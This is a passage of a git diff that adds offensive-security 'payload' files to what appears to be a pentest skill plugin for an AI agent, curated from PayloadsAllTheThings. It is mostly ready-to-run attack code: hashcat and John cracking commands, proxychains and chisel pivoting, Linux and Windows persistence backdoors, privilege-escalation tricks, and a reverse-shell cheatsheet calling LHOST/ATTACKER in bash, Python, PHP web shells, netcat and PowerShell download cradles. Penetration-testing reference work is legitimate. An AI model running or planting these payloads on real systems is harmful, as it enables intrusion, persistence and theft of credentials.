+# CUPP — profile-based personal wordlist +pip install cupp +cupp -i # interactive mode (asks name, birthday, pet, etc.) +cupp -l # download common wordlists + +# CeWL — spider target website for words +cewl https://TARGET.COM -d 3 -m 5 -w cewl_words.txt +# Combine with rules +hashcat -m 1000 hashes.txt cewl_words.txt -r best64.rule + +# Mentalist / kwprocessor (keyboard walk patterns) +kwp basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes-combinator.route -o keyboard_walks.txt +``` + +### Hash Type Reference + +| Hash | Hashcat Mode | Example | +|------|-------------|---------| +| MD5 | 0 | `5f4dcc3b5aa765d61d8327deb882cf99` | +| SHA1 | 100 | `5baa61e4...` | +| SHA256 | 1400 | | +| bcrypt | 3200 | `$2a$10$...` (slow — use fewer rules) | +| NTLM | 1000 | `32 hex chars` | +| NetNTLMv2 | 5600 | From Responder capture | +| Kerberos TGS (Kerberoast) | 13100 | `$krb5tgs$...` | +| AS-REP (ASREPRoast) | 18200 | `$krb5asrep$...` | +| WPA2-PMKID | 22000 | From hcxdumptool | +| SHA512crypt (Linux `$6$`) | 1800 | | +| MySQL4.1/SHA1 | 300 | | +| MSSQL 2012+ | 1731 | | + +### Online Lookup (try first — free, instant) +``` +https://hashes.com/en/decrypt/hash +https://crackstation.net/ +``` + +### Hashcat Optimisation Flags +```bash +# Always add for speed +-O # optimised kernels (may reduce max password length to 31) +-w 3 # workload profile 3 (high GPU use — desktop only) +--status # print status every 10s + +# Session save/restore +--session=crack1 +--restore # resume: hashcat --restore --session=crack1 + +# Show cracked +hashcat -m 1000 hashes.txt --show +``` + +## Notes + +- **Tools**: hashcat, john, cupp, cewl, kwprocessor, hcxtools, RainbowCrack, PACK +- Start: online lookup → rockyou + best64 → OneRule → mask → CUPP/CeWL custom +- bcrypt/scrypt: GPU speed is 10,000× slower than MD5 — wordlist only, no brute +- Kerberoastable hashes: crack offline with no account lockout risk +- NTLM = unsalted — precomputed tables work if hash not found in wordlist + +--- +*Full list: `patt-fetcher` agent → "Hash Cracking rules"* diff --git a/plugins/pentest/skills/pentest/attacks/system/hash-cracking/payloads/techniques.md b/plugins/pentest/skills/pentest/attacks/system/hash-cracking/payloads/techniques.md new file mode 100644 index 0000000..8c25a4b --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/hash-cracking/payloads/techniques.md @@ -0,0 +1,97 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Hash Cracking.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Hash%20Cracking.md +last-curated: 2026-03-13 +priority: critical +--- + +# Hash Cracking — Techniques + +## Hashcat Commands + +```bash +# NTLM (Windows password hash) +hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt +hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule + +# NetNTLMv2 (captured via responder) +hashcat -m 5600 netntlmv2.txt /usr/share/wordlists/rockyou.txt + +# MD5 +hashcat -m 0 md5.txt /usr/share/wordlists/rockyou.txt + +# SHA1 +hashcat -m 100 sha1.txt /usr/share/wordlists/rockyou.txt + +# SHA256 +hashcat -m 1400 sha256.txt /usr/share/wordlists/rockyou.txt + +# bcrypt +hashcat -m 3200 bcrypt.txt /usr/share/wordlists/rockyou.txt + +# WPA2 +hashcat -m 22000 wpa2.hccapx /usr/share/wordlists/rockyou.txt + +# Kerberoast (TGS-REP) +hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt + +# AS-REP Roast +hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt + +# Attack modes +-a 0 # dictionary attack (default) +-a 1 # combination attack +-a 3 # brute force / mask +-a 6 # dictionary + mask +``` + +## John the Ripper Commands + +```bash +# Auto-detect hash type +john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt + +# NTLM +john --format=nt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt + +# NetNTLMv2 +john --format=netntlmv2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt + +# MD5 +john --format=raw-md5 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt + +# SHA1 +john --format=raw-sha1 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt + +# bcrypt +john --format=bcrypt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt + +# WPA2 (convert first) +hccap2john wpa2.hccapx > wpa2_john.txt +john wpa2_john.txt --wordlist=/usr/share/wordlists/rockyou.txt + +# Show cracked +john hash.txt --show +john --format=nt hash.txt --show +``` + +## Identify Hash Type + +```bash +hashid hash.txt +hash-identifier +# Online: https://hashes.com/en/tools/hash_identifier +``` + +## Useful Rules + +```bash +# Best64 rule (great for common mutations) +hashcat -m 1000 hash.txt rockyou.txt -r best64.rule + +# OneRuleToRuleThemAll +hashcat -m 1000 hash.txt rockyou.txt -r OneRule.rule +``` + +*Full list: patt-fetcher agent → "Hash Cracking"* diff --git a/plugins/pentest/skills/pentest/attacks/system/network-pivoting/payloads/proxychains.md b/plugins/pentest/skills/pentest/attacks/system/network-pivoting/payloads/proxychains.md new file mode 100644 index 0000000..bdeb467 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/network-pivoting/payloads/proxychains.md @@ -0,0 +1,108 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Network Pivoting Techniques.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md +last-curated: 2026-03-13 +priority: critical +--- + +# Proxychains Configuration & Usage + +## proxychains.conf (SOCKS5) + +```ini +# /etc/proxychains4.conf or /etc/proxychains.conf +strict_chain +# dynamic_chain # skip dead proxies +# random_chain + +proxy_dns + +tcp_read_time_out 15000 +tcp_connect_time_out 8000 + +[ProxyList] +socks5 127.0.0.1 1080 +``` + +## proxychains.conf (SOCKS4) + +```ini +strict_chain +proxy_dns + +[ProxyList] +socks4 127.0.0.1 1080 +``` + +## proxychains.conf (HTTP proxy) + +```ini +strict_chain +proxy_dns + +[ProxyList] +http 127.0.0.1 8080 +``` + +## proxychains.conf (Chain multiple proxies) + +```ini +dynamic_chain +proxy_dns + +[ProxyList] +socks5 127.0.0.1 1080 # chisel/SSH SOCKS +socks5 127.0.0.1 9050 # Tor +``` + +## Usage with Common Tools + +```bash +# nmap (TCP connect scan only — no SYN through proxychains) +proxychains nmap -sT -Pn -p 22,80,443,3389 192.168.1.0/24 +proxychains nmap -sT -Pn --open -p- 192.168.1.100 + +# curl +proxychains curl http://192.168.1.100/ +proxychains curl -k https://192.168.1.100/admin + +# hydra (brute force through pivot) +proxychains hydra -l admin -P rockyou.txt 192.168.1.100 ssh +proxychains hydra -l admin -P rockyou.txt 192.168.1.100 http-post-form "/login:u=^USER^&p=^PASS^:Invalid" + +# ssh through proxy +proxychains ssh user@192.168.2.100 + +# crackmapexec +proxychains crackmapexec smb 192.168.1.0/24 -u user -p password + +# impacket tools +proxychains python3 secretsdump.py DOMAIN/user:pass@192.168.1.100 +proxychains python3 wmiexec.py DOMAIN/user:pass@192.168.1.100 + +# msfconsole +proxychains msfconsole +``` + +## Setup Workflow + +```bash +# 1. Start pivot (SSH dynamic) +ssh -D 1080 user@jump_host -N -f + +# OR chisel +./chisel server --port 8000 --reverse & # attacker +./chisel client ATTACKER:8000 R:socks # victim + +# 2. Configure proxychains +echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf + +# 3. Scan internal network +proxychains nmap -sT -Pn 10.10.10.0/24 + +# 4. Attack through proxy +proxychains python3 GetUserSPNs.py DOMAIN/user:pass -dc-ip 10.10.10.1 -request +``` + +*Full list: patt-fetcher agent → "Network Pivoting"* diff --git a/plugins/pentest/skills/pentest/attacks/system/network-pivoting/payloads/tunneling.md b/plugins/pentest/skills/pentest/attacks/system/network-pivoting/payloads/tunneling.md new file mode 100644 index 0000000..a2dacd6 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/network-pivoting/payloads/tunneling.md @@ -0,0 +1,91 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Network Pivoting Techniques.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md +last-curated: 2026-03-13 +priority: critical +--- + +# Network Pivoting — Tunneling + +## SSH Port Forwarding + +**Local forward (-L): access remote service locally** +```bash +# Access TARGET_HOST:TARGET_PORT via localhost:LOCAL_PORT +ssh -L LOCAL_PORT:TARGET_HOST:TARGET_PORT user@JUMP_HOST +ssh -L 8080:192.168.1.100:80 user@jump.example.com +ssh -L 3306:db-internal:3306 user@bastion -N +``` + +**Remote forward (-R): expose local port on remote** +```bash +# Expose LOCAL_PORT on REMOTE_PORT of SSH server +ssh -R REMOTE_PORT:localhost:LOCAL_PORT user@ATTACKER +ssh -R 4444:localhost:4444 user@attacker.com -N +``` + +**Dynamic SOCKS proxy (-D)** +```bash +# Create SOCKS5 proxy on LOCAL_PORT +ssh -D LOCAL_PORT user@JUMP_HOST -N +ssh -D 1080 user@jump.example.com -N -f + +# Use with proxychains +# Set socks5 127.0.0.1 1080 in proxychains.conf +proxychains nmap -sT -Pn 192.168.1.0/24 +``` + +**SSH options for stability** +```bash +-N # no remote command +-f # background +-C # compression +-q # quiet +``` + +## Chisel + +**Setup (download from github.com/jpillora/chisel)** + +**Server (attacker side):** +```bash +./chisel server -p 8000 --reverse +./chisel server --port 8000 --reverse --socks5 +``` + +**Client (victim side):** +```bash +# SOCKS5 reverse proxy +./chisel client ATTACKER:8000 R:socks + +# Specific port forward +./chisel client ATTACKER:8000 R:LOCAL_PORT:TARGET:TARGET_PORT + +# Forward local port to target +./chisel client ATTACKER:8000 8080:192.168.1.100:80 +``` + +**Use with proxychains:** +```bash +# In proxychains.conf: socks5 127.0.0.1 1080 +proxychains curl http://192.168.1.100/ +``` + +## Socat Port Forwarding + +```bash +# Forward local port to remote +socat TCP-LISTEN:LOCAL_PORT,fork TCP:TARGET_HOST:TARGET_PORT + +# Example: forward 8080 to internal web server +socat TCP-LISTEN:8080,fork TCP:192.168.1.100:80 + +# Background +socat TCP-LISTEN:8080,fork TCP:192.168.1.100:80 & + +# With UDP +socat UDP-LISTEN:53,fork UDP:8.8.8.8:53 +``` + +*Full list: patt-fetcher agent → "Network Pivoting"* diff --git a/plugins/pentest/skills/pentest/attacks/system/persistence/payloads/linux.md b/plugins/pentest/skills/pentest/attacks/system/persistence/payloads/linux.md new file mode 100644 index 0000000..b131854 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/persistence/payloads/linux.md @@ -0,0 +1,108 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Linux - Persistence.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md +last-curated: 2026-03-13 +priority: critical +--- + +# Linux Persistence Payloads + +## Cron Jobs + +```bash +# User crontab +crontab -e +* * * * * bash -i >& /dev/tcp/LHOST/LPORT 0>&1 + +# System crontab +echo "* * * * * root bash -i >& /dev/tcp/LHOST/LPORT 0>&1" >> /etc/crontab + +# cron.d directory +echo "* * * * * root /tmp/backdoor.sh" > /etc/cron.d/backdoor + +# Cron script +cat > /tmp/backdoor.sh << 'EOF' +#!/bin/bash +bash -i >& /dev/tcp/LHOST/LPORT 0>&1 +EOF +chmod +x /tmp/backdoor.sh +``` + +## .bashrc / .profile Modification + +```bash +# Append to user's bashrc +echo 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1 &' >> ~/.bashrc +echo 'nohup bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1" &' >> ~/.profile +echo 'export PATH=/tmp:$PATH' >> ~/.bashrc # PATH hijack +``` + +## Systemd Service + +```ini +# /etc/systemd/system/backdoor.service +[Unit] +Description=System Update Service +After=network.target + +[Service] +Type=simple +ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1' +Restart=always +RestartSec=30 + +[Install] +WantedBy=multi-user.target +``` + +```bash +systemctl enable backdoor.service +systemctl start backdoor.service +``` + +## SSH Authorized Keys + +```bash +# Generate key pair (attacker) +ssh-keygen -t rsa -f backdoor_key + +# Add public key to target +mkdir -p ~/.ssh +echo "ssh-rsa AAAA... attacker" >> ~/.ssh/authorized_keys +chmod 600 ~/.ssh/authorized_keys + +# Connect +ssh -i backdoor_key user@TARGET +``` + +## SUID Backdoor + +```bash +# Copy bash with SUID +cp /bin/bash /tmp/.hidden_bash +chmod u+s /tmp/.hidden_bash +/tmp/.hidden_bash -p # execute as owner (root if root copied it) + +# SUID shell script wrapper +cp /bin/bash /var/tmp/.sshd +chmod 4755 /var/tmp/.sshd +``` + +## LD_PRELOAD Persistence + +```c +// backdoor.c +#include <stdio.h> +#include <stdlib.h> +void __attribute__((constructor)) init() { + system("bash -i >& /dev/tcp/LHOST/LPORT 0>&1 &"); +} +``` + +```bash +gcc -shared -fPIC -o /lib/x86_64-linux-gnu/libbackdoor.so backdoor.c +echo "/lib/x86_64-linux-gnu/libbackdoor.so" >> /etc/ld.so.preload +``` + +*Full list: patt-fetcher agent → "Linux Persistence"* diff --git a/plugins/pentest/skills/pentest/attacks/system/persistence/payloads/windows.md b/plugins/pentest/skills/pentest/attacks/system/persistence/payloads/windows.md new file mode 100644 index 0000000..de51d3a --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/persistence/payloads/windows.md @@ -0,0 +1,98 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Windows - Persistence.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md +last-curated: 2026-03-13 +priority: critical +--- + +# Windows Persistence Payloads + +## Registry Run Keys + +```cmd +# HKCU (current user, no admin needed) +reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Temp\shell.exe" /f + +# HKLM (all users, admin needed) +reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Temp\shell.exe" /f + +# RunOnce +reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Backdoor /t REG_SZ /d "C:\Temp\shell.exe" /f + +# PowerShell +New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Backdoor" -Value "C:\Temp\shell.exe" -PropertyType String +``` + +## Scheduled Tasks + +```cmd +# Basic scheduled task +schtasks /create /tn "WindowsUpdate" /tr "C:\Temp\shell.exe" /sc onstart /ru SYSTEM /f +schtasks /create /tn "WindowsUpdate" /tr "C:\Temp\shell.exe" /sc minute /mo 5 /f + +# PowerShell +$action = New-ScheduledTaskAction -Execute "C:\Temp\shell.exe" +$trigger = New-ScheduledTaskTrigger -AtStartup +Register-ScheduledTask -TaskName "WindowsUpdate" -Action $action -Trigger $trigger -RunLevel Highest -Force +``` + +## Startup Folder + +```cmd +# Current user +copy shell.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" + +# All users (admin) +copy shell.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\" + +# PowerShell +Copy-Item "C:\Temp\shell.exe" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\" +``` + +## Windows Service + +```cmd +sc create BackdoorSvc binPath= "C:\Temp\shell.exe" start= auto +sc description BackdoorSvc "Windows Management Service" +sc start BackdoorSvc + +# PowerShell +New-Service -Name "BackdoorSvc" -BinaryPathName "C:\Temp\shell.exe" -StartupType Automatic +``` + +## DLL Hijacking (persistence) + +```bash +# Place malicious DLL where app loads it on startup +# App search order: same dir → System32 → Windows → PATH + +msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f dll -o version.dll +copy version.dll "C:\Vulnerable\App\version.dll" +``` + +## WMI Event Subscription + +```powershell +# Event filter (trigger: every 60 seconds) +$EventFilter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{ + Name = "WMIPersist" + EventNamespace = "root/cimv2" + QueryLanguage = "WQL" + Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" +} + +# Event consumer (action) +$CommandLineConsumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{ + Name = "WMIPersist" + CommandLineTemplate = "C:\Temp\shell.exe" +} + +# Binding +Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ + Filter = $EventFilter + Consumer = $CommandLineConsumer +} +``` + +*Full list: patt-fetcher agent → "Windows Persistence"* diff --git a/plugins/pentest/skills/pentest/attacks/system/privilege-escalation/payloads/linux.md b/plugins/pentest/skills/pentest/attacks/system/privilege-escalation/payloads/linux.md new file mode 100644 index 0000000..bbf9c5b --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/privilege-escalation/payloads/linux.md @@ -0,0 +1,126 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Linux - Privilege Escalation.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md +last-curated: 2026-03-13 +priority: critical +--- + +# Linux Privilege Escalation Payloads + +## Check Commands (Enumerate First) + +```bash +whoami; id; uname -a; cat /etc/os-release +sudo -l +find / -perm -4000 2>/dev/null # SUID +find / -perm -2000 2>/dev/null # SGID +getcap -r / 2>/dev/null # Capabilities +cat /etc/crontab; ls -la /etc/cron.* # Cron +echo $PATH; ls -la /tmp # PATH +cat /etc/passwd | grep -v nologin # Users +``` + +## SUID Exploitation + +```bash +# Find SUID binaries +find / -perm -4000 -type f 2>/dev/null + +# GTFOBins examples +/usr/bin/find . -exec /bin/bash -p \; -quit +/usr/bin/vim -c ':!/bin/bash' +/usr/bin/less /etc/passwd # then: !/bin/bash +/usr/bin/nmap --interactive # then: !sh +/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' +/usr/bin/cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash; /tmp/rootbash -p +``` + +## Sudo Misconfigurations + +```bash +sudo -l # check allowed commands + +# NOPASSWD examples +sudo /usr/bin/find / -exec /bin/bash \; +sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")' +sudo /usr/bin/less /etc/shadow +sudo /usr/bin/vim -c ':!/bin/bash' +sudo /usr/bin/awk 'BEGIN {system("/bin/bash")}' + +# CVE-2019-14287 (sudo < 1.8.28) +sudo -u#-1 /bin/bash +``` + +## Writable /etc/passwd + +```bash +# Generate password hash +openssl passwd -1 -salt hacker hacker123 + +# Append new root user +echo 'hacker:$1$hacker$HASH:0:0:hacker:/root:/bin/bash' >> /etc/passwd +su hacker # password: hacker123 +``` + +## Cron Exploitation + +```bash +# Monitor cron +cat /etc/crontab +ls -la /var/spool/cron/crontabs/ +crontab -l + +# If script is world-writable +echo 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1' >> /path/to/cron_script.sh + +# PATH hijack via cron +# cron runs: /usr/local/bin/backup (writable dir) +echo '#!/bin/bash\nbash -i >& /dev/tcp/LHOST/LPORT 0>&1' > /usr/local/bin/backup +chmod +x /usr/local/bin/backup +``` + +## Capabilities + +```bash +getcap -r / 2>/dev/null + +# Exploit examples +python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' # cap_setuid +/usr/bin/python3 -c 'import os; os.setuid(0); os.execl("/bin/bash","bash")' +# cap_net_raw: use for network sniffing +# cap_dac_read_search: read any file +``` + +## PATH Hijack + +```bash +# Identify vulnerable SUID using relative paths +strings /path/to/suid | grep -i "^[a-z]" + +# Create malicious binary +export PATH=/tmp:$PATH +echo '#!/bin/bash\nbash -p' > /tmp/vulnerable_cmd +chmod +x /tmp/vulnerable_cmd +./suid_binary # executes our script as root +``` + +## LD_PRELOAD (with sudo NOPASSWD) + +```c +// malicious.c +#include <stdio.h> +#include <sys/types.h> +#include <stdlib.h> +void _init() { + unsetenv("LD_PRELOAD"); + setgid(0); setuid(0); + system("/bin/bash"); +} +``` +```bash +gcc -fPIC -shared -o /tmp/malicious.so malicious.c -nostartfiles +sudo LD_PRELOAD=/tmp/malicious.so /usr/bin/find +``` + +*Full list: patt-fetcher agent → "Linux Privilege Escalation"* diff --git a/plugins/pentest/skills/pentest/attacks/system/privilege-escalation/payloads/windows.md b/plugins/pentest/skills/pentest/attacks/system/privilege-escalation/payloads/windows.md new file mode 100644 index 0000000..2aa353b --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/privilege-escalation/payloads/windows.md @@ -0,0 +1,112 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Windows - Privilege Escalation.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md +last-curated: 2026-03-13 +priority: critical +--- + +# Windows Privilege Escalation Payloads + +## Check Commands (Enumerate First) + +```cmd +whoami /all +whoami /priv +systeminfo +net localgroup administrators +sc query +wmic service get name,startname,pathname,startmode +reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated +reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated +``` + +## AlwaysInstallElevated + +```bash +# Check both keys must be 1 +reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated +reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated + +# Create malicious MSI +msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi -o evil.msi + +# Execute +msiexec /quiet /qn /i evil.msi +``` + +## Unquoted Service Paths + +```bash +# Find unquoted paths +wmic service get name,startname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ + +# Example: C:\Program Files\My Service\service.exe +# Drop payload at: C:\Program.exe or C:\Program Files\My.exe + +msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o "C:\Program Files\My.exe" +sc stop VulnService +sc start VulnService +``` + +## Token Impersonation — Potato Attacks + +```bash +# SeImpersonatePrivilege check +whoami /priv | findstr SeImpersonatePrivilege + +# PrintSpoofer (Windows 10/Server 2019) +PrintSpoofer.exe -i -c cmd +PrintSpoofer.exe -c "nc.exe LHOST LPORT -e cmd" + +# GodPotato (Server 2012-2022) +GodPotato.exe -cmd "cmd /c whoami" +GodPotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe LHOST LPORT" + +# JuicyPotato (older systems) +JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID} + +# RoguePotato +RoguePotato.exe -r ATTACKER_IP -e "cmd.exe" -l 9999 +``` + +## DLL Hijacking + +```bash +# Find missing DLLs via Process Monitor (Procmon filter: Result=NAME NOT FOUND + Path ends .dll) +# Or check known vulnerable service paths + +# Create malicious DLL +msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f dll -o missing.dll + +# Place in service/app directory with write perms +copy missing.dll "C:\Vulnerable\App\missing.dll" +# Restart service or wait for restart +``` + +## SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege + +```powershell +# Check +whoami /priv + +# Abuse via PrintSpoofer / Potato (see above) +# Or via nc relay: +nc.exe -lvnp 4444 +``` + +## Weak Service Permissions + +```cmd +# Check service permissions +sc sdshow VulnService +accesschk.exe /accepteula -uwcqv "Authenticated Users" * +accesschk.exe /accepteula -ucqv VulnService + +# Modify service binary path +sc config VulnService binpath= "cmd.exe /c net localgroup administrators hacker /add" +sc stop VulnService +sc start VulnService +``` + +*Full list: patt-fetcher agent → "Windows Privilege Escalation"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/system/privilege-escalation/system-exploitation.md b/plugins/pentest/skills/pentest/attacks/system/privilege-escalation/system-exploitation.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/system/privilege-escalation/system-exploitation.md rename to plugins/pentest/skills/pentest/attacks/system/privilege-escalation/system-exploitation.md diff --git a/plugins/pentest/skills/pentest/attacks/system/reverse-shells/payloads/cheatsheet.md b/plugins/pentest/skills/pentest/attacks/system/reverse-shells/payloads/cheatsheet.md new file mode 100644 index 0000000..c2aca0c --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/reverse-shells/payloads/cheatsheet.md @@ -0,0 +1,105 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Reverse Shell Cheatsheet.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md +last-curated: 2026-03-13 +priority: critical +--- + +# Reverse Shell Cheatsheet + +Variables: replace `LHOST` and `LPORT` in all payloads. + +## Listener (always start first) + +```bash +nc -lvnp LPORT +rlwrap nc -lvnp LPORT # with readline support +socat file:`tty`,raw,echo=0 tcp-listen:LPORT +``` + +## Bash + +```bash +bash -i >& /dev/tcp/LHOST/LPORT 0>&1 +bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1' +0<&196;exec 196<>/dev/tcp/LHOST/LPORT; sh <&196 >&196 2>&196 +exec 5<>/dev/tcp/LHOST/LPORT; cat <&5 | while read line; do $line 2>&5 >&5; done +``` + +## Python 3 + +```bash +python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("LHOST",LPORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])' + +python3 -c 'import os,pty,socket; s=socket.socket(); s.connect(("LHOST",LPORT)); [os.dup2(s.fileno(),f) for f in (0,1,2)]; pty.spawn("/bin/bash")' +``` + +## PHP + +```bash +php -r '$sock=fsockopen("LHOST",LPORT);exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("LHOST",LPORT);$proc=proc_open("/bin/sh",array(0=>$sock,1=>$sock,2=>$sock),$pipes);' + +# Web shell one-liner +<?php system($_GET['cmd']); ?> +<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'"); ?> +``` + +## Perl + +```bash +perl -e 'use Socket;$i="LHOST";$p=LPORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +``` + +## Ruby + +```bash +ruby -rsocket -e 'f=TCPSocket.open("LHOST",LPORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +ruby -rsocket -e 'exit if fork;c=TCPSocket.new("LHOST","LPORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` + +## Netcat (with -e) + +```bash +nc LHOST LPORT -e /bin/bash +nc LHOST LPORT -e /bin/sh +ncat LHOST LPORT -e /bin/bash +``` + +## Netcat (without -e / OpenBSD nc) + +```bash +rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT > /tmp/f +rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT > /tmp/f +``` + +## PowerShell + +```powershell +powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('LHOST',LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" + +# Download cradle + reverse shell +powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://LHOST/shell.ps1')" +``` + +## Socat + +```bash +# Attacker listener (full TTY) +socat file:`tty`,raw,echo=0 tcp-listen:LPORT + +# Target +socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:LHOST:LPORT +``` + +## Shell Upgrade (after getting basic shell) + +```bash +python3 -c 'import pty; pty.spawn("/bin/bash")' +# then: Ctrl+Z +stty raw -echo; fg +export TERM=xterm +``` + +*Full list: patt-fetcher agent → "Reverse Shell Cheatsheet"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/access-control/access-control-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/web-applications/access-control/access-control-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/access-control/access-control-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/web-applications/access-control/access-control-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/access-control/access-control-index.md b/plugins/pentest/skills/pentest/attacks/web-applications/access-control/access-control-index.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/access-control/access-control-index.md rename to plugins/pentest/skills/pentest/attacks/web-applications/access-control/access-control-index.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/access-control/access-control-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/web-applications/access-control/access-control-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/access-control/access-control-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/web-applications/access-control/access-control-portswigger-labs-complete.md diff --git 